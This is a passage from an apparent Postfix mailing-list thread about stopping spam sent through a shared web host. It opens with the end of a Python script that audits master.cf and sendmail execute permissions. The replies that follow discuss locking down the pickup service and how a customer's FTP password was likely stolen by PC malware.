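    """Return the set of (name, type) pairs for uncommented service entries.

    master.cf rules: '#' starts a comment, a line beginning with whitespace
    continues the previous entry (the -o overrides), and an entry has eight
    fields: name type private unpriv chroot wakeup maxproc command.
    """
    services = set()
    for line in master_cf_text.splitlines():
        if not line.strip() or line.startswith("#") or line[0].isspace():
            continue
        fields = line.split()
        if len(fields) >= 8:
            services.add((fields[0], fields[1]))
    return services


def audit_master_cf(master_cf_text):
    """Summarise the two entries the thread cares about."""
    services = enabled_services(master_cf_text)
    return {
        "pickup_enabled": ("pickup", "unix") in services,
        "submission_enabled": ("submission", "inet") in services,
    }


def non_root_can_execute(path):
    """True when the group or other execute bit is set, i.e. the uid a web
    application runs as could invoke this binary and hence the pickup path."""
    mode = os.stat(path).st_mode
    return bool(mode & (stat.S_IXGRP | stat.S_IXOTH))


def demo_sendmail_permissions():
    """Create a placeholder 'sendmail' file, check it at the stock 0755 and
    again after chmod 0700 (execute restricted to root, as suggested above).
    Returns (executable_by_non_root_before, executable_by_non_root_after)."""
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "sendmail")   # placeholder, not /usr/sbin/sendmail
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\n")
        os.chmod(path, 0o755)
        before = non_root_can_execute(path)
        os.chmod(path, 0o700)
        after = non_root_can_execute(path)
    return before, after


if __name__ == "__main__":
    print("stock    :", audit_master_cf(WEAK_MASTER_CF))
    print("hardened :", audit_master_cf(HARDENED_MASTER_CF))
    print("sendmail executable by non-root (0755, 0700):", demo_sendmail_permissions())
```

On a live box, point `audit_master_cf` at the contents of `/etc/postfix/master.cf` and `non_root_can_execute` at the real sendmail path; a `True` from the latter means any script a customer's account can run still has a route into the queue.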
                            • lists@...
                              Message 14 of 18 , Oct 8, 2013
                                On Wed, October 9, 2013 10:41 am, Stan Hoeppner wrote:
                                > On 10/8/2013 3:08 PM, lists@... wrote:

                                Stan, Michael and others who responded, thanks

                                > Others responded with some good ideas here, mostly locking down PHP
                                > itself so it can't use the sendmail binary. But it sounds like this is a
                                > generic web hosting server for your customers. Which means they may be
                                > using all manner of languages other than PHP, such as Perl, Java, etc.

                                modified php.ini as per Michael's suggestion;
                                yes, it is as you suggest, 'all manner..';

                                > In this case, the most thorough way to lock this down, other than
                                > disabling the pickup service in master.cf, is to restrict execute
                                > permissions on the sendmail binary to root. This prevents all web
                                > applications from using the pickup service. Then instruct all of your
                                > users to use the submission service on TCP 587 for sending mail.
                                > Disabling pickup is the easiest and quickest way to stop this spamming
                                > permanently. But it will likely break management functions that need to
                                > send mail via pickup, such as logwatch, pflogsumm, etc. Thus restricting
                                > which users can execute the sendmail binary is a better solution.

                                I'll work towards that later today

                                I'm still perplexed with access: the user claims no one else had ftp
                                password, ftp password was a random 8-char alpha/numeric string,
                                can there be any other reason that leaked password...?
                              • Stan Hoeppner
                                Message 15 of 18 , Oct 8, 2013
                                  On 10/8/2013 7:15 PM, lists@... wrote:
                                  > On Wed, October 9, 2013 10:41 am, Stan Hoeppner wrote:
                                  >> On 10/8/2013 3:08 PM, lists@... wrote:
                                  >
                                  > Stan, Michael and others who responded, thanks
                                  >
                                  >> Others responded with some good ideas here, mostly locking down PHP
                                  >> itself so it can't use the sendmail binary. But it sounds like this is a
                                  >> generic web hosting server for your customers. Which means they may be
                                  >> using all manner of languages other than PHP, such as Perl, Java, etc.
                                  >
                                  > modified php.ini as per Michael's suggestion;
                                  > yes, it is as you suggest, 'all manner..';
                                  >
                                  >> In this case, the most thorough way to lock this down, other than
                                  >> disabling the pickup service in master.cf, is to restrict execute
                                  >> permissions on the sendmail binary to root. This prevents all web
                                  >> applications from using the pickup service. Then instruct all of your
                                  >> users to use the submission service on TCP 587 for sending mail.
                                  >> Disabling pickup is the easiest and quickest way to stop this spamming
                                  >> permanently. But it will likely break management functions that need to
                                  >> send mail via pickup, such as logwatch, pflogsumm, etc. Thus restricting
                                  >> which users can execute the sendmail binary is a better solution.
                                  >
                                  > I'll work towards that later today
                                  >
                                  > I'm still perplexed with access: the user claims no one else had ftp

                                  Look at every file in this user's publicly accessible directory tree.
                                  You may find that s/he saved the username/password in a text file
                                  (regardless of file extension, or name), which is quite common for many
                                  users, especially those who don't update the site but once every few
                                  weeks, months, etc. They bookmark the URL and "remember" the
                                  credentials this way when they need to work on the site. Crackers will
                                  often find such files, even if not exposed anywhere in the HTML content
                                  of the site.

                                  > password, ftp password was a random 8-char alpha/numeric string,
                                  > can there be any other reason that leaked password...?

                                  There are all manner of ways credentials can fall into the wrong hands.
                                  Above is only one. The simplest is the Post-it note, both literally
                                  and metaphorically. You can't control this. What you can is the
                                  password itself, and the frequency of change. Random passwords are
                                  meaningless if someone can simply copy or steal the Post-it. Changing
                                  passwords regularly helps mitigate this problem, but not if users simply
                                  put the new password in an accessible file, as in the scenario above.

                                  --
                                  Stan
                                • Robert L Mathews
                                  Message 16 of 18 , Oct 10, 2013
                                    On 10/8/13 5:15 PM, lists@... wrote:

                                    > I'm still perplexed with access: the user claims no one else had ftp
                                    > password, ftp password was a random 8-char alpha/numeric string,
                                    > can there be any other reason that leaked password...?

                                    There are several Windows PC viruses, including the common "Gumblar"
                                    family, that steal saved FTP passwords from files on the computer.

                                    They simply have a list of file locations where various FTP clients such
                                    as FileZilla and Dreamweaver store saved passwords. They scan all these
                                    locations and send any results back to a central server.

                                    Some of these viruses also incorporate network sniffing to detect FTP
                                    passwords.

                                    So even if the password was random and used only on a single computer,
                                    it may have been obtained by evildoers if the user checked a "remember
                                    this password" option or ever connected to a non-TLS FTP server. The
                                    user should scan any computer that ever used this password for viruses.

                                    --
                                    Robert L Mathews, Tiger Technologies, http://www.tigertech.net/
                                  • lists@...
                                    Message 17 of 18 , Oct 10, 2013
                                      On Fri, October 11, 2013 4:56 am, Robert L Mathews wrote:
                                      > On 10/8/13 5:15 PM, lists@... wrote:

                                      > There are several Windows PC viruses, including the common "Gumblar"
                                      > family, that steal saved FTP passwords from files on the computer.
                                      > They simply have a list of file locations where various FTP clients such
                                      > as FileZilla and Dreamweaver store saved passwords. They scan all these
                                      > locations and send any results back to a central server.

                                      Robert,

                                      thanks for explanation, that makes a lot of sense in this scenario, and,
                                      the most likely reason (I guess I couldn't see the forest for the
                                      trees...)

                                      Voytek
                                    • lists@...
                                      Message 18 of 18 , Oct 10, 2013
                                        On Fri, October 11, 2013 10:49 am, lists@... wrote:
                                        > On Fri, October 11, 2013 4:56 am, Robert L Mathews wrote:

                                        >> There are several Windows PC viruses, including the common "Gumblar"
                                        >> family, that steal saved FTP passwords from files on the computer. They

                                        > thanks for explanation, that makes a lot of sense in this scenario, and,
                                        > the most likely reason

                                        On Wed, October 9, 2013 3:52 pm, Stan Hoeppner wrote:

                                        > Look at every file in this user's publicly accessible directory tree.
                                        > You may find that s/he saved the username/password in a text file

                                        fwiw, just followed it up with the user, he now confirmed his PC did have a
                                        malware issue a few months ago, after he opened a 'your parcel delivery' zip
                                        file, etc

                                        and, he did have p/w stored on infected PC

                                        thanks again for all help and suggestions to everyone,